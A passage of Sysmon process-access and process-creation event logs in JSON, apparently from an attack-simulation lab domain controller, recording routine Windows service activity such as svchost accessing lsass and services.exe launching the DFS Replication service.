07:53:23.947","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1247,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.948\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.948","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1248,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.948\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B5CA0200}\r\nTargetProcessId: 3160\r\nTargetImage: C:\\Windows\\system32\\wbem\\unsecapp.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.948","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B5CA0200}","TargetProcessId":"3160","TargetImage":"C:\\Windows\\system32\\wbem\\unsecapp.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1249,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.948\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.948","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1250,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.908\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001044C20200}\r\nProcessId: 2904\r\nImage: C:\\Windows\\System32\\dfsrs.exe\r\nFileVersion: 10.0.14393.2879 (rs1_release_inmarket.190313-1855)\r\nDescription: Distributed File System Replication\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: dfsr.exe\r\nCommandLine: C:\\Windows\\system32\\DFSRs.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=5043D2DBA1E5AC37A9874B403B48C1C1,SHA256=7044CE273B245F6D67A3BFC7D548CFF538F8FC3BD1C99467B5ADE6452C150313,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.908","ProcessGuid":"{41C8662E-1F73-5F25-0000-001044C20200}","Image":"C:\\Windows\\System32\\dfsrs.exe","FileVersion":"10.0.14393.2879 (rs1_release_inmarket.190313-1855)","Description":"Distributed File System Replication","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"dfsr.exe","CommandLine":"C:\\Windows\\system32\\DFSRs.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=5043D2DBA1E5AC37A9874B403B48C1C1,SHA256=7044CE273B245F6D67A3BFC7D548CFF538F8FC3BD1C99467B5ADE6452C150313,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1251,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.957\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1120\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.957","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"1120","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1252,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.957\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.957","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1253,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.973\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1124\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.973","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"1124","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1254,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.975\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.975","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1255,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.020\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F5F-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: 